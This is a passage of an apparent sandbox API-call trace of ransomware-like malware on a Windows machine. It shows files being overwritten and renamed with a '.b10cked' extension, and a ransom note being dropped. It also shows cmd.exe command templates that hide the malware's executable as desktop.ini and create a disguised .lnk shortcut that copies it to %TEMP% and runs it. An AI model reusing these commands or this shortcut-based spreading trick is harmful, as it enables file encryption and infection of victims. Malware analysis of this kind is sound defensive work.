hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xd410 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0144.602] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6a07, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6a07, lpOverlapped=0x0) returned 1 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0144.602] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6a07, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6a07, lpOverlapped=0x0) returned 1 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=-27143, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6a09 [0144.602] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6a07, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6a07, lpOverlapped=0x0) returned 1 [0144.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=-27143, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6a09 [0144.603] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6a07, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6a07, lpOverlapped=0x0) returned 1 [0144.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QO_v_Iwy7B17SYlN-.jpg", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0144.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QO_v_Iwy7B17SYlN-.jpg", cchWideChar=21, lpMultiByteStr=0x13288fc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QO_v_Iwy7B17SYlN-.jpg", lpUsedDefaultChar=0x0) returned 21 [0144.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xd410 [0144.607] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0144.607] CloseHandle (hObject=0x114) returned 1 [0144.608] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\QO_v_Iwy7B17SYlN-.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG") returned 0x2f [0144.608] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\") returned 0x23 [0144.608] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_V_I~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\QO_v_Iwy7B17SYlN-.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x9c0, dwThreadId=0x9b8)) returned 1 [0144.610] CloseHandle (hObject=0x110) returned 1 [0144.610] CloseHandle (hObject=0x114) returned 1 [0144.610] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\") returned 0x27 [0144.610] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", cchLength=0x3a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\") returned 0x3a [0144.610] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\", cchCount1=39, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\", cchCount2=58) returned 1 [0144.610] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\") returned 0x27 [0144.610] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0144.610] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\", cchCount1=39, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0144.610] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0144.611] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0144.611] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0144.611] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\") returned 0x23 [0144.611] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0144.611] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0144.611] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x9f4, dwThreadId=0x9dc)) returned 1 [0144.615] CloseHandle (hObject=0x110) returned 1 [0144.615] CloseHandle (hObject=0x114) returned 1 [0144.615] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\bl0cked-readme.rtf")) returned 0xffffffff [0144.616] GetLastError () returned 0x2 [0144.616] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0144.618] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\bl0cked-readme.rtf")) returned 0x20 [0144.618] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0144.618] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0144.619] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0144.619] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0144.619] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0144.619] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0144.619] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0144.619] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\") returned 0x23 [0144.619] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0144.619] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0144.619] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1") returned 0x22 [0144.619] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x146 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x146 [0144.620] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0144.620] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0x954, dwThreadId=0x8a8)) returned 1 [0144.624] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0145.814] CloseHandle (hObject=0x114) returned 1 [0145.814] CloseHandle (hObject=0x110) returned 1 [0145.814] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0145.814] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0145.814] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0145.814] GetTickCount () returned 0x2d680 [0145.814] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=20260357297) returned 1 [0145.814] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x78\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0145.814] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x77\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0145.814] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x57\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0145.814] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x69\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0145.814] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x74\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0145.815] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x47\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0145.815] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x61\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0145.815] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0145.815] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0145.815] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0145.815] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0145.815] CharUpperBuffW (in: lpsz="explorer.exe \"lr0aR2rEWELj\" & type \"lr0aR2rEWELj\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x69 | out: lpsz="EXPLORER.EXE \"LR0AR2REWELJ\" & TYPE \"LR0AR2REWELJ\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x69 [0145.815] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0145.815] CharUpperBuffW (in: lpsz="explorer.exe \"lr0aR2rEWELj\" & type \"lr0aR2rEWELj\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x6a | out: lpsz="EXPLORER.EXE \"LR0AR2REWELJ\" & TYPE \"LR0AR2REWELJ\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x6a [0145.815] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0145.815] CoInitialize (pvReserved=0x0) returned 0x0 [0145.815] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0145.816] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0145.816] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0145.816] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0145.818] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"lr0aR2rEWELj\" & type \"lr0aR2rEWELj\\desktop.ini\" > \"%TEMP%\\xwWitGan.exe\" && \"%TEMP%\\xwWitGan.exe\"") returned 0x0 [0145.818] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0145.818] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0145.818] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0145.818] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj.lnk", fRemember=0) returned 0x0 [0145.826] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0145.826] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0145.826] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0145.826] CoUninitialize () [0145.826] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0145.826] ReleaseMutex (hMutex=0xf8) returned 1 [0145.826] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0145.827] ReleaseMutex (hMutex=0xf8) returned 1 [0145.827] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0145.827] ReleaseMutex (hMutex=0xf8) returned 1 [0145.827] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0145.827] ReleaseMutex (hMutex=0xf8) returned 1 [0145.827] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\wo_IX7FkjtTmLgs.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\wo_ix7fkjttmlgs.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0145.827] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.827] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.827] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.827] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20261667319) returned 1 [0145.828] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.828] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.828] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.828] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.828] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11e61 [0145.828] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.829] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0145.829] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x11e61 [0145.829] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: 